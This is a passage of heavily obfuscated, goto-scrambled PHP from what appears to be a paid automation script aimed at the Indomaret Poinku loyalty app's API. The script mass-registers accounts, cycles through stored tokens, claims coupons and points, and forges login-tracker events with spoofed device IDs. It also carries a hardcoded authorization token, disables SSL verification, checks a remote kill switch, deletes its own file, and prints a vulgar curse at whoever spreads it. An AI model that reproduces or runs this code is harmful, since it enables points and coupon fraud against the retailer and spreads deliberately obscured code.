    curl_setopt($C6npe, CURLOPT_FOLLOWLOCATION, true); 
    goto DePwW; 
    ha2Mf: 
    $ECuqv = curl_exec($C6npe); 
    goto MtxRw; 
    Sf63t: 
    $C6npe = curl_init(); 
    goto P5x1k; 
    rqGky: 
    print_r($AXlcQ); 
    goto R9JZf; 
    giq61: 
    if (!$P7lm9) { 
      goto sk06s; 
    } 
    goto oprV8; 
    OQd73: 
    goto ebIZt; 
    goto d2mok; 
    e6CFv: 
    curl_setopt($C6npe, CURLOPT_HTTPHEADER, $ruc3h); 
    goto kRHBB; 
    ddExm: 
    curl_setopt($C6npe, CURLOPT_COOKIEJAR, "indo.txt"); 
    goto Ay05N; 
    P5x1k: 
    curl_setopt($C6npe, CURLOPT_URL, $lEbop); 
    goto xG1DX; 
    P8vqE: 
    $ruc3h[] = "user-agent: okhttp/4.9.0"; 
    goto gQAbh; 
    Ay05N: 
    curl_setopt($C6npe, CURLOPT_COOKIEFILE, "indo.txt"); 
    goto ha2Mf; 
    PkO5C: 
    $y7f11 = substr($ECuqv, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE)); 
    goto OQd73; 
    fOIj4: 
    ebIZt: 
    goto r0PO3; 
    DePwW: 
    curl_setopt($C6npe, CURLOPT_RETURNTRANSFER, 1); 
    goto P8vqE; 
    oprV8: 
    $ruc3h = substr($ECuqv, 0, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE)); 
    goto PkO5C; 
    kLG6F: 
  } 
  goto EbIaF; 
  Tq1Up: 
  htQmu: 
  goto M4ZDE; 
  O0hxR: 
  n5UbT: 
  goto ITp7p; 
  Jaank: 
  k9jad: 
  goto PuPZU; 
  VZdN4: 
  $ZNU2M = @$owfHy["data"]["content"][$D2zwh]["couponName"]; 
  goto MTZD5; 
  r0iPg: 
  VRnC_: 
  goto UUQep; 
  FI_gp: 
  die; 
  goto Yekgm; 
  XgYhk: 
  echo "
"; 
  goto yOKeR; 
  Nb0X4: 
  echo $yy9BI . ". "; 
  goto ptOzD; 
  VXKB5: 
  echo @zm6Ic("nevy", " | Script IDM Cek Poin
"); 
  goto Xpi4j; 
  A3oaD: 
  sleep(2); 
  goto UWw0n; 
  oEbC2: 
  $owfHy = json_decode($XTuz1, true); 
  goto UHHXN; 
  QIpsV: 
  $v1ZMX = str_replace("\xd", '', $wPFxB); 
  goto YISeP; 
  pWv96: 
  $J0Fkh = @$owfHy["data"]["content"][$dQ8Tp]["quota"]; 
  goto AwDD1; 
  ADYHk: 
  $mlMLt = $obc_G; 
  goto w3dkM; 
  uVfSY: 
  die; 
  goto F21Gw; 
  vT103: 
  $eqo_P = @file_get_contents("beat"); 
  goto usfrB; 
  OIj3S: 
  y1Iam: 
  goto kMlqh; 
  xZqqd: 
  echo @ZM6Ic("nevy", $YXsOG); 
  goto s4WP6; 
  FK02O: 
  $zvt88 = $IKJzx; 
  goto JXPEQ; 
  TqaEk: 
  echo "\xa"; 
  goto YNjDv; 
  cT7sZ: 
  echo "\xa"; 
  goto KRL_Q; 
  VrZaE: 
  $mYT0v["respon"] = json_decode($zy8D_, true); 
  goto VtQl6; 
  sHluB: 
  eOkr8: 
  goto D0i6Z; 
  sThR9: 
  cXIKR: 
  goto ft7vH; 
  YT9J8: 
  JKU8P: 
  goto XJjoI; 
  iMEyj: 
  echo @zM6Ic("nevy", $YXsOG); 
  goto ZzJEY; 
  CHNi6: 
  echo @ZM6IC("yellow", "Nama Kuponnya  : "); 
  goto RNAEK; 
  OvZkE: 
  $wZnHP = $lPULW[$jTEU0]; 
  goto ijTty; 
  Ecn2N: 
  $yy9BI; 
  goto ZezGD; 
  eyI9u: 
  $lPULW = $m0f8X; 
  goto e8lpL; 
  Xo2nr: 
  $wDisp = "{"userId":" . $R_bYC . ","deviceType":"01","deviceId":"" . $aY0el . "","fcmToken":"" . $WYrgv . ":APA91bFt9WuOdnYit_hOvqmHC2uMGiiCwp_u8JgO0kB3sgYQNxoWqO57EEYpAAAVjjDCY8C4j-ePHCYG6Mgcg85RehNO33xt1RRP6DIPVu36qkFHdkfQ9GeTDH8WFrSaiiBzkeZGm9wp"}"; 
  goto U_2QW; 
  k_cPh: 
  $m5BZY = gggR_("https://asia-southeast2-idm-corp-prd.cloudfunctions.net/idmapps_tracker_gateway", $wDisp); 
  goto am0nY; 
  Gg0l9: 
  echo "\xa"; 
  goto S9BGT; 
  JBC35: 
  goto bvf0h; 
  goto QMeBt; 
  QmHCB: 
  goto i5Ayp; 
  goto TAFxv; 
  xW7i4: 
  $kCT0W = str_replace("-", '', $cod3H); 
  goto LE6IR; 
  Wo0m2: 
  $Ipl73 = @$owfHy["data"][0]["district"]["province"]; 
  goto SFBUG; 
  z1S5b: 
  hc1uy: 
  goto t1_y0; 
  kPhu0: 
  $jTEU0++; 
  goto UXn5u; 
  NTLhy: 
  $jTEU0++; 
  goto teyF2; 
  fITcJ: 
  echo @Zm6Ic("nevy", $kp_uF); 
  goto sVbAt; 
  Aa3T3: 
  NYs__: 
  goto i5Kia; 
  eqyZ2: 
  echo "
"; 
  goto IVGka; 
  gGSXs: 
  if (!($cPDPt == 17)) { 
    goto iwC6F; 
  } 
  goto rWTTh; 
  zkBq9: 
  echo @ZM6Ic("nevy", $XDyMm); 
  goto RrOSK; 
  HWxH4: 
  $M1ADy = @$Ap1KM["data"]["id"]; 
  goto MY65q; 
  cyzwh: 
  $H1g60 = json_decode($yI7qh, true); 
  goto fTiXw; 
  UfbNl: 
  echo @zM6iC("red", "
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\xa"); 
  goto v1Kc0; 
  JgUFe: 
  echo @zm6IC("nevy", $ZNU2M); 
  goto P1XjP; 
  Rnq3x: 
  echo @ZM6IC("red", "\xa~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\xa"); 
  goto okpAe; 
  HpGT7: 
  if (!($jTEU0 < $S8W9D)) { 
    goto IHjkB; 
  } 
  goto wlYZy; 
  iHrm4: 
  $U_EVz = @$owfHy["data"][0]["subDistrict"]["subDistrictCode"]; 
  goto QxZ8E; 
  G0hLP: 
  $O8Mmj = xozb4(array(":"), $jze6k)[2]; 
  goto LtRQg; 
  b944Q: 
  echo @zM6ic("nevy", $ZqwwP); 
  goto ERz4c; 
  jk3HC: 
  $U0YgX = str_replace("\xd", '', $zcN5u); 
  goto DgJtQ; 
  ptjzv: 
  $QG8my = $qeP83; 
  goto lt5C6; 
  vSSuK: 
  eM0mo: 
  goto iaa8j; 
  IfjVc: 
  nNgh2: 
  goto F2SO3; 
  p61aQ: 
  $qtgR3++; 
  goto nOgbN; 
  Mt8og: 
  $b2ucB = @$owfHy["data"][$qtgR3]["cityName"]; 
  goto DSkp1; 
  WQtAk: 
  $v1ZMX = str_replace("\xd", '', $wPFxB); 
  goto eI2DI; 
  OMVIC: 
  die; 
  goto YMWoX; 
  VhWc9: 
  echo @ZM6ic("nevy", " SEMOGA LOBANG PANTAT NYA BISULAN!!!!! \xa"); 
  goto UfDTf; 
  cSFfS: 
  echo @zm6IC("yellow", "ID nya: "); 
  goto TcCw8; 
  m2PK0: 
  $yPeiy = @$H1g60["refreshToken"]; 
  goto KS3CE; 
  xn_1c: 
  curl_close($C6npe); 
  goto uNQ8P; 
  Aed5e: 
  if (!($zcN5u == '')) { 
    goto dVFa2; 
  } 
  goto DvkOx; 
  VrunV: 
  $wZnHP = $lPULW[$jTEU0]; 
  goto r7FiT; 
  yrVV7: 
  echo @Zm6Ic("yellow", "Build By FERDY RAMADHAN "); 
  goto qNcWT; 
  QScqr: 
  $basER = @$lImQC["data"]["content"][0]["status"]; 
  goto LVnAQ; 
  Xt3c5: 
  $Bz8Et = @$owfHy["data"][0]["postalCode"]["postalCode"]; 
  goto SGE2l; 
  EzY9G: 
  echo "Deleted {$xp_1p} "; 
  goto kXsPH; 
  dmrOw: 
  $ZNU2M = @$Ap1KM["data"]["couponName"]; 
  goto vEGl4; 
  SFBUG: 
  $K4tCB = @$owfHy["data"][0]["district"]["provinceName"]; 
  goto aQS5l; 
  mx2GA: 
  echo @zM6iC("red", "Yah... Ayam Nya Ga Ada , Akan Di Cek Kembali..."); 
  goto HeT1k; 
  q9l5G: 
  NzAWp: 
  goto r4NLu; 
  zd5Ut: 
  echo @zm6iC("green", "Pilih : "); 
  goto DCe2w; 
  ZSznK: 
  echo $BcbF3; 
  goto kqX3g; 
  BySUD: 
  $m0f8X = explode("
", @file_get_contents("mytoken")); 
  goto zFklN; 
  XC7On: 
  print_r($zcN5u); 
  goto pH0u8; 
  yeGkX: 
  $tqWr2 = $zvt88[$yy9BI]; 
  goto KcLeH; 
  MoCCw: 
  $ruc3h = ["X-Requested-With: XMLHttpRequest", "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safari/537.36"]; 
  goto TXqhc; 
  gNu5p: 
  $m0f8X = explode("
", @file_get_contents("mytoken")); 
  goto FpT14; 
  liGR7: 
  if (!unlink($xp_1p)) { 
    goto hAy4Q; 
  } 
  goto HdRao; 
  mZygY: 
  echo "\xa"; 
  goto FR3s4; 
  Al7wy: 
  echo @Zm6IC("yellow", "Pesan : "); 
  goto sJ4Cl; 
  aKLgU: 
  echo "\xa"; 
  goto LCYe1; 
  hwlm8: 
  fblk0: 
  goto Uv0u9; 
  gkcvz: 
  echo @Zm6iC("yellow", " - Semoga Cuan ^^ Terima Kasih Telah Membeli Script Ini
"); 
  goto vPKzt; 
  vaWNC: 
  echo "
"; 
  goto vuGa0; 
  RG7P9: 
  echo @Zm6iC("yellow", "    YANG NYEBARIN SCRIPT INI \xa"); 
  goto y23qq; 
  Q40cO: 
  v8iSe: 
  goto e2U0W; 
  dsC4G: 
  $nPb0z = json_decode($Jk9cx, true); 
  goto ElGmQ; 
  N3_fB: 
  if (!($zcN5u == '')) { 
    goto Y1LJ5; 
  } 
  goto TRBQ4; 
  T9KaD: 
  $wd9cN = date("d-m-Y | H:i:s"); 
  goto haa26; 
  c3hCT: 
  $ZqwwP = @$owfHy["data"][$dQ8Tp]["keyword"]; 
  goto sWeiZ; 
  LZi1O: 
  $VJtH7 = @$owfHy["data"]["content"][$dQ8Tp]["pointExchangeId"]; 
  goto J5SJE; 
  PltW2: 
  echo "
"; 
  goto SwrwN; 
  SVWfL: 
  echo @zm6ic("yellow", " 12 . Claim Kupon
"); 
  goto t2UQK; 
  qAfot: 
  $efQM2 = count($QRhbE) - 1; 
  goto fcX90; 
  gECUy: 
  echo "
"; 
  goto Wmiu1; 
  P0Tqd: 
  echo "
"; 
  goto li7p9; 
  sJ4Cl: 
  echo @zM6iC("nevy", $ABmxY); 
  goto WC5FU; 
  RS0jB: 
  $wDisp = "{"data":[{"application":{"app_version":"3.13.0","device_class":"Phone","device_family":"" . $GOXkU . "","device_id":"" . $aY0el . "","os_name":"Android P","os_version":"Android 9"},"core":{"event_label":"login","event_name":"event_submission","event_status":"success","event_timestamp":" . $nb9cm . "},"marketing":{"utm_raw":"utm_source=google-play&utm_medium=organic"},"user":{"session_id":"" . $MXjqh . "","user_ip_address":"127.0.0.1"}}]}"; 
  goto hYPdD; 
  FzzRT: 
  $owfHy = json_decode($XTuz1, true); 
  goto mtJDK; 
  TXqhc: 
  $C6npe = curl_init(); 
  goto aHo28; 
  mHVo8: 
  goto rHN94; 
  goto soYFB; 
  eYvyG: 
  if ($eAEyy == "Diskon Rp 25.000 Klik Indomaret") { 
    goto yrh1H; 
  } 
  goto rmeAQ; 
  q3S0N: 
  goto GsrX0; 
  goto OWCKV; 
  EGbwm: 
  echo @zm6iC("red", "Yah... Ayam Nya Ga Ada , Akan Di Cek Kembali..."); 
  goto D1f2D; 
  t0FCe: 
  SCsGz: 
  goto NHckK; 
  rKNAf: 
  $upOL9 = g8PF2("https://edtsapp.indomaretpoinku.com/loyalty/apix-1502-api/mobile/points/me", $aY0el, $GOXkU, $mlMLt); 
  goto Cu1Rm; 
  RTqsK: 
  echo "
"; 
  goto tcJMt; 
  QFrmT: 
  echo "
"; 
  goto p3S5N; 
  b5EpG: 
  $e52KH = @$lImQC["data"]["content"][16]["couponCode"]; 
  goto qr3SL; 
  D6NeB: 
  goto Q9w_S; 
  goto LijEy; 
  bCOU4: 
  echo @zm6IC("nevy", "Sorry, This Script Has Been Removed By The Owner!!"); 
  goto TDRWg; 
  r44f6: 
  echo @zm6iC("green", "[16] {$PKr5B} 
  > {$kGhP3} 

"); 
  goto X_5QB; 
  xuF8a: 
  $D2zwh; 
  goto THW2n; 
  oyg3B: 
  $mlMLt = $obc_G; 
  goto yGUlS; 
  Bneb2: 
  echo @zM6IC("nevy", "Sorry, This Script Has Been Removed By The Owner!!"); 
  goto oCnIM; 
  ePkw1: 
  $aY0el = $jlHkA; 
  goto fw4lA; 
  kfZ6v: 
  $aY0el = $v1ZMX; 
  goto KzC24; 
  LW72A: 
  die; 
  goto L0p_i; 
  a0kRQ: 
  goto vsi0y; 
  goto pRS6N; 
  jYjqX: 
  $efQM2 = count($QRhbE) - 1; 
  goto ZCeM4; 
  HGduE: 
  curl_setopt($C6npe, CURLOPT_POSTFIELDS, $z5CDs); 
  goto jibTK; 
  VYgN7: 
  $wlJRC = xOzB4(array("|"), $wZnHP)[1]; 
  goto CotX3; 
  Ys25d: 
  $ofEkP = a0MYl("https://indomaretpoinku.com/api/gamificationReady", $wDisp, $N0ol8, $M1ADy, $aY0el, $GOXkU, $mlMLt); 
  goto S9Ofg; 
  iqD2p: 
  w88np: 
  goto e4xvp; 
  lt5C6: 
  echo @ZM6iC("nevy", "Akun Ke    : "); 
  goto h560o; 
  nODjW: 
  die; 
  goto uX1ga; 
  n_ddg: 
  $m0f8X = explode("\xa", @file_get_contents("mytoken")); 
  goto AMMpd; 
  yjcW3: 
  $sONlZ = str_replace("\xd", '', $rERzL); 
  goto chsNn; 
  pqL5O: 
  ptn8D: 
  goto gdThu; 
  JlfKN: 
  echo "
"; 
  goto SriS5; 
  ZGdOo: 
  goto wCiUR; 
  goto ulLqL; 
  XxnqS: 
  $m5BZY = ggGR_("https://asia-southeast2-idm-corp-prd.cloudfunctions.net/idmapps_tracker_gateway", $wDisp); 
  goto QxYhI; 
  aPAP6: 
  goto WfXbO; 
  goto OvB3v; 
  rWTTh: 
  echo @zm6Ic("red", "\xa~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\xa"); 
  goto ARsDv; 
  t0TRa: 
  die; 
  goto e8gJe; 
  WpQfH: 
  echo "\xa"; 
  goto yCk2k; 
  zayXM: 
  $U0YgX = str_replace("\xd", '', $zcN5u); 
  goto pT_BP; 
  GZbpD: 
  echo @Zm6ic("yellow", "Kode Kuponnya  : "); 
  goto z8qyV; 
  hDDi0: 
  echo @Zm6Ic("yellow", " 4 . Register Poinku\xa"); 
  goto Pjpiq; 
  OWHjB: 
  echo @zm6IC("nevy", $ABmxY); 
  goto Tty61; 
  s24Xx: 
  $aY0el = $v1ZMX; 
  goto RhwLr; 
  PzxHu: 
  $wDisp = "{"phoneNumber":"" . $zn5zd . "","deviceId":"" . $aY0el . ""}"; 
  goto D6ZaQ; 
  oHvEu: 
  die; 
  goto AKHCV; 
  u7ReR: 
  $xzAuu = @$owfHy["data"][0]["subDistrict"]["value"]; 
  goto e5JB2; 
  Vsuo7: 
  echo @zM6ic("purple", "Member ID : "); 
  goto q6e41; 
  MlxLs: 
  $SR3ui = @$cQFRW["data"]["couponCode"]; 
  goto qa6Zn; 
  fp_Tv: 
  $zn5zd = substr_replace($O8Mmj, "0", 0, 2); 
  goto CeZ6r; 
  d2zLL: 
  $hGkCN = trim(fgets(STDIN)); 
  goto vgbrR; 
  v4487: 
  $wDisp = "{"data":[{"application":{"app_version":"3.13.0","device_class":"Phone","device_family":"" . $GOXkU . "","device_id":"" . $aY0el . "","os_name":"Android P","os_version":"Android 9"},"core":{"event_label":"login","event_name":"event_submission","event_status":"success","event_timestamp":" . $nb9cm . "},"marketing":{"utm_raw":"utm_source=google-play&utm_medium=organic"},"user":{"session_id":"" . $MXjqh . "","user_ip_address":"127.0.0.1"}}]}"; 
  goto BDxWd; 
  OG9eF: 
  echo @Zm6iC("yellow", "SCAN BARCODE INI AGAR KASIR LEBIH MUDAH.."); 
  goto ot1CO; 
  wEXqb: 
  $KbHJf = rand(1000000, 9999999); 
  goto E28sd; 
  GxlNR: 
  echo @zM6ic("yellow", "Build By FERDY RAMADHAN "); 
  goto smKwr; 
  G3zOO: 
  $QRhbE = explode("
", @file_get_contents("forceclose")); 
  goto NKHpy; 
  j6M7L: 
  $Jk9cx = G8pF2("https://edtsapp.indomaretpoinku.com/loyalty/apix-1502-api/mobile/reminders/me", $aY0el, $GOXkU, $mlMLt); 
  goto F0uMw; 
  Tj0tS: 
  $wDisp = "{"keyword":"" . $ip0vw . ""}"; 
  goto d18Bg; 
  C826k: 
  die; 
  goto wHuxC; 
  SPakz: 
  echo "\xa"; 
  goto n7HcN; 
  TlphE: 
  $p4iky = @$Ap1KM["data"]["memberId"]; 
  goto Dydaf; 
  csAPf: 
  echo @zM6iC("yellow", "Nama Barang : "); 
  goto k3DWO; 
  w_vuh: 
  goto V7t6B; 
  goto ezb0I; 
  v8qnX: 
  $lPULW = $m0f8X; 
  goto b1QyZ; 
  bI4nj: 
  $UHj7C = G8PF2("https://edtsapp.indomaretpoinku.com/coupon/apix-1502-api/mobile/coupons?unpaged=true", $aY0el, $GOXkU, $mlMLt); 
  goto xGjbC; 
  aBtiv: 
  $m5BZY = gggR_("https://asia-southeast2-idm-corp-prd.cloudfunctions.net/idmapps_tracker_gateway", $wDisp); 
  goto cMm4X; 
  yoo1d: 
  $jlHkA = str_replace("-", '', $sOOnY); 
  goto xjMrp; 
  yB2Vl: 
  echo @zM6IC("yellow", " 7 . Generate Token Pembayaran
"); 
  goto snQTX; 
  uiAfq: 
  echo @ZM6IC("red", "\xa~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"); 
  goto CC5qC; 
  yHo5h: 
  if (!($kp_uF == "1")) { 
    goto z3XBs; 
  } 
  goto ElxJu; 
  Plsof: 
  $S8W9D = trim(fgets(STDIN)); 
  goto cFW3Z; 
  e8lpL: 
  $wZnHP = $lPULW[$jTEU0]; 
  goto vRmvG; 
  TDRWg: 
  @unlink("poinhp.php"); 
  goto PwA2q; 
  IRVRS: 
  echo @Zm6iC("nevy", $XDyMm); 
  goto pllF8; 
  nRt6q: 
  blHDG($ZNU2M . ".txt", $SR3ui); 
  goto W3rdR; 
  mHcF1: 
  $XTuz1 = G1WxT("https://edtsapp.indomaretpoinku.com/customer/apix-1502-api/mobile/customer-address", $wDisp, $aY0el, $GOXkU, $mlMLt); 
  goto FzzRT; 
  LhXhn: 
  BINZC: 
  goto WLUFd; 
  SGE2l: 
  $pugmZ = @$owfHy["data"][0]["postalCode"]["postalCodeId"]; 
  goto v2L4I; 
  PLeOQ: 
  echo "\xa"; 
  goto KWjZ5; 
  ahQhu: 
  echo @zm6ic("nevy", $YXsOG); 
  goto cnUbl; 
  ZO4Kj: 
  echo "\xa"; 
  goto eefzo; 
  SpiQk: 
  if (!($fUekS == '')) { 
    goto dvsNz; 
  } 
  goto eHSlO; 
  NUXI3: 
  echo "\xa"; 
  goto lMFbm; 
  nOgbN: 
  goto v8B4y; 
  goto I9fin; 
  M4L5M: 
  echo "
"; 
  goto PdwRl; 
  v4M4o: 
  $wDisp = "{"phoneNumber":"" . $zn5zd . "","deviceId":"" . $aY0el . ""}"; 
  goto V1jox; 
  hJ8Yw: 
  BzIvW: 
  goto U0P17; 
  DZWQy: 
  $CdOss = "10000000"; 
  goto aSxUw; 
  ctI1q: 
  echo @zm6ic("nevy", $YXsOG); 
  goto RTqsK; 
  vuGa0: 
  echo @zM6ic("yellow", "Nama Desa    : "); 
  goto wstM7; 
  VCCS6: 
  $wlJRC = xoZb4(array("|"), $wZnHP)[1]; 
  goto MyAZJ; 
  PNM0g: 
  $BcbF3 = @$Ap1KM["data"]["phoneNumber"]; 
  goto UKSbZ; 
  E_Op0: 
  KV6h2: 
  goto ZQ2mS; 
  QNKX2: 
  $aY0el = $v1ZMX; 
  goto yFgwh; 
  razQG: 
  echo @ZM6Ic("green", "Masukkan Password Device Anda : "); 
  goto QfkH3; 
  zddGh: 
  $owfHy = json_decode($XTuz1, true); 
  goto dFRET; 
  pWN9s: 
  echo "\xa"; 
  goto kSamf; 
  bf2kg: 
  $LD6vG = trim(file_get_contents("https://irfan.iproute.my.id/ipoinx/medansi/poinmot")); 
  goto A0Vdd; 
  RhKbU: 
  echo "
"; 
  goto ffkgN; 
  EY27O: 
  $m0f8X = explode("\xa", @file_get_contents("mytoken")); 
  goto w_Cs4; 
  VE_Bb: 
  $Jk9cx = G8PF2("https://edtsapp.indomaretpoinku.com/customer/apix-1502-api/mobile/customer-address", $aY0el, $GOXkU, $mlMLt); 
  goto gT7PW; 
  XUNNf: 
  echo "
"; 
  goto N_7zY; 
  PCpFs: 
  goto PG5CP; 
  goto xQq0X; 
  haa26: 
  echo @zm6ic("green", $wd9cN); 
  goto lstXN; 
  gwIsu: 
  if (!($kTI3Y == '')) { 
    goto CWwim; 
  } 
  goto qcX1a; 
  sWc79: 
  $Jk9cx = G8PF2("https://edtsapp.indomaretpoinku.com/loyalty/apix-1502-api/mobile/reminders/me", $aY0el, $GOXkU, $mlMLt); 
  goto mBwSQ; 
  MOApc: 
  echo @zm6ic("yellow", "
OTP ANDA SALAH, SILAHKAN INPUT YANG BARU!!

"); 
  goto sZ24Y; 
  D2_Ke: 
  $wDisp = "{"pinCode":"" . $earOL . ""}"; 
  goto a2iK3; 
  JFUAt: 
  if ($kbWoT == "Diskon Rp 25.000 Klik Indomaret") { 
    goto GVUqX; 
  } 
  goto z87ev; 
  jmVzd: 
  $efQM2 = count($QRhbE) - 1; 
  goto rThth; 
  bdqBC: 
  echo @zM6ic("nevy", $ABmxY); 
  goto Qw0Sd; 
  fWyr0: 
  echo @zm6iC("red", "
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"); 
  goto diI12; 
  XUHGp: 
  $p4iky = @$Ap1KM["data"]["memberId"]; 
  goto PMIzX; 
  kgTcS: 
  $XDyMm = @$Ap1KM["data"]["balance"]; 
  goto h_PCX; 
  dyoyZ: 
  function GGgR_($lEbop, $wDisp = null) 
  { 
    goto OsG9f; 
    ALvBY: 
    $ruc3h[] = "content-type: application/json; charset=UTF-8"; 
    goto E6YXP; 
    GKBJf: 
    print_r($AXlcQ); 
    goto bgXrP; 
    YHaQn: 
    curl_setopt($C6npe, CURLOPT_URL, $lEbop); 
    goto Fe2UM; 
    EdcDf: 
    $y7f11 = substr($ECuqv, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE)); 
    goto QhwCb; 
    bgXrP: 
    return $ECuqv; 
    goto CNED9; 
    RC2Bh: 
    $ECuqv = curl_exec($C6npe); 
    goto RqCv5; 
    wR88P: 
    curl_setopt($C6npe, CURLOPT_POSTFIELDS, $wDisp); 
    goto ohBYu; 
    MomEj: 
    curl_setopt($C6npe, CURLOPT_HTTPHEADER, $ruc3h); 
    goto s3mGo; 
    QhwCb: 
    goto NWvDg; 
    goto XGcM2; 
    BYogT: 
    curl_setopt($C6npe, CURLOPT_POST, 1); 
    goto qMmNt; 
    OsG9f: 
    $C6npe = curl_init(); 
    goto YHaQn; 
    E6YXP: 
    $ruc3h[] = "user-agent: okhttp/5.0.0-alpha.5"; 
    goto SB18M; 
    ahrEx: 
    curl_setopt($C6npe, CURLOPT_RETURNTRANSFER, 1); 
    goto BYogT; 
    wkzgW: 
    curl_setopt($C6npe, CURLOPT_COOKIEFILE, "klik.txt"); 
    goto RC2Bh; 
    RqCv5: 
    $P7lm9 = curl_getinfo($C6npe); 
    goto HFVq_; 
    HFVq_: 
    if (!$P7lm9) { 
      goto XdH7G; 
    } 
    goto FuSII; 
    FuSII: 
    $ruc3h = substr($ECuqv, 0, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE)); 
    goto EdcDf; 
    s3mGo: 
    curl_setopt($C6npe, CURLOPT_SSL_VERIFYPEER, 0); 
    goto wR88P; 
    V9mgM: 
    NWvDg: 
    goto HmWQ6; 
    SB18M: 
    curl_setopt($C6npe, CURLOPT_AUTOREFERER, true); 
    goto MomEj; 
    ohBYu: 
    curl_setopt($C6npe, CURLOPT_COOKIEJAR, "klik.txt"); 
    goto wkzgW; 
    Fe2UM: 
    curl_setopt($C6npe, CURLOPT_FOLLOWLOCATION, true); 
    goto ahrEx; 
    HmWQ6: 
    $AXlcQ = json_decode($y7f11, true); 
    goto GKBJf; 
    qMmNt: 
    $ruc3h[] = "authorization: NNKSkTdooQo7vUGVG5eGkgYSVW7SabSjffafao35nfoan3ygfaa"; 
    goto ALvBY; 
    XGcM2: 
    XdH7G: 
    goto SrrFs; 
    SrrFs: 
    return false; 
    goto V9mgM; 
    CNED9: 
  } 
  goto NEtRK; 
  gD4Hv: 
  $wd9cN = date("d-m-Y | H:i:s"); 
  goto BqeQN; 
  uYg9g: 
  echo "Sampai Baris Ke : "; 
  goto b_gi8; 
  naXLO: 
  $Jk9cx = G8pF2("https://edtsapp.indomaretpoinku.com/customer/apix-1502-api/is-whatsapp-verified", $aY0el, $GOXkU, $mlMLt); 
  goto Zkmak; 
  m280i: 
  echo @Zm6ic("yellow", "Nama Kuponnya  : "); 
  goto i8Wxa; 
  CsTYI: 
  $Jk9cx = G8pf2("https://edtsapp.indomaretpoinku.com/customer/apix-1502-api/mobile/detail-customer-origin", $aY0el, $GOXkU, $mlMLt); 
  goto wbvww; 
  jjZVf: 
  $u35jw = count($m0f8X) - 1; 
  goto VQozi; 
  TAwyA: 
  echo @zM6Ic("red", "\xa~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"); 
  goto x_9e2; 
  QiKp7: 
  $Jk9cx = g8PF2("https://edtsapp.indomaretpoinku.com/loyalty/apix-1502-api/mobile/stamps/me", $aY0el, $GOXkU, $mlMLt); 
  goto ykUuj; 
  wKmCR: 
  $wDisp = "{"subDistrict":"" . $ldzeo . "","subDistrictCode":"" . $U_EVz . "","value":"" . $xzAuu . ""}"; 
  goto zeS_n; 
  TdnY9: 
  $m5BZY = gGGr_("https://asia-southeast2-idm-corp-prd.cloudfunctions.net/idmapps_tracker_gateway", $wDisp); 
  goto Lb03I; 
  y8VKP: 
  $jTEU0 = "0"; 
  goto k2aOv; 
  VQozi: 
  $lPULW = $m0f8X; 
  goto UuPZd; 
  phNSJ: 
  shell_exec("start chrome "https://barcode.tec-it.com/barcode.ashx?data="" . $p4iky . ""&code=Code128&multiplebarcodes=false&translate-esc=true&unit=Fit&dpi=96&imagetype=Gif&rotation=0&color=%23000000&bgcolor=%23ffffff&codepage=Default&qunit=Mm&quiet=10&hidehrt=False""); 
  goto RaRdi; 
  cvmiq: 
  $qtgR3++; 
  goto jpdpf; 
  Nz6rs: 
  $Ap1KM = json_decode($upOL9, true); 
  goto d9ZGt; 
  Hzhxt: 
  z3XBs: 
  goto KAZAL; 
  op03J: 
  AQDm2: 
  goto fyrrg; 
  ukSNL: 
  $k1y0B = G1wXt("https://edtsapp.indomaretpoinku.com/login/apix-1502-api/open/pin/is-pin-exist", $wDisp, $aY0el, $GOXkU, $mlMLt); 
  goto pHOIf; 
  jZ12F: 
  $Ap1KM = json_decode($upOL9, true); 
  goto ihLm0; 
  x0V_6: 
  echo "\xa"; 
  goto M6siS; 
  sqioU: 
  $mlMLt = @$owfHy["data"]["access_token"]; 
  goto hwdtM; 
  AU3Y9: 
  $w5ulg = str_replace("\xd", '', $TvVlh); 
  goto YbjIM; 
  v2L4I: 
  $SD3v6 = @$owfHy["data"][0]["recipientEmail"]; 
  goto Ydv5v; 
  G_E8D: 
  $QRhbE = explode("\xa", @file_get_contents("mytoken")); 
  goto tbDFN; 
  IYPI4: 
  $gCIzy = @$owfHy["data"]["content"][$fM3_G]["stampExchangeId"]; 
  goto MRiKw; 
  H_1h5: 
  psmh5: 
  goto UDy_g; 
  hYPdD: 
  $m5BZY = gGgR_("https://asia-southeast2-idm-corp-prd.cloudfunctions.net/idmapps_tracker_gateway", $wDisp); 
  goto Ao7nr; 
  KHl5h: 
  $m5BZY = GGgR_("https://asia-southeast2-idm-corp-prd.cloudfunctions.net/idmapps_tracker_gateway", $wDisp); 
  goto Ul2z5; 
  AIk12: 
  echo @Zm6iC("yellow", "Keyword     : "); 
  goto yEnw1; 
  HdRao: 
  echo "Deleted {$xp_1p} "; 
  goto P3s5s; 
  a5HAT: 
  $wd9cN = date("d-m-Y | H:i:s"); 
  goto r2f9G; 
  OlQAM: 
  goto eyO14; 
  goto cG1au; 
  aIbLu: 
  echo "\xa"; 
  goto GNQma; 
  cjmuY: 
  ODvt2: 
  goto L05Ik; 
  G6Vck: 
  hRDFl: 
  goto MJ9En; 
  b3huw: 
  echo @zM6ic("yellow", "Lanjut Buat Alamat Akun Lain \xa
"); 
  goto cyP0m; 
  RBPjd: 
  $YUfPv = @$owfHy["data"][0]["address"]; 
  goto Rmpkm; 
  dKfQt: 
  $m5BZY = GGgR_("https://asia-southeast2-idm-corp-prd.cloudfunctions.net/idmapps_tracker_gateway", $wDisp); 
  goto N0JV1; 
  EUpE7: 
  if (!($cPDPt == 16)) { 
    goto e1oJO; 
  } 
  goto aHEZg; 
  rIxAs: 
  echo "\xa"; 
  goto IWXpk; 
  kXhiU: 
  echo @ZM6ic("yellow", "Poin Akun Anda : "); 
  goto U2vmb; 
  emm3P: 
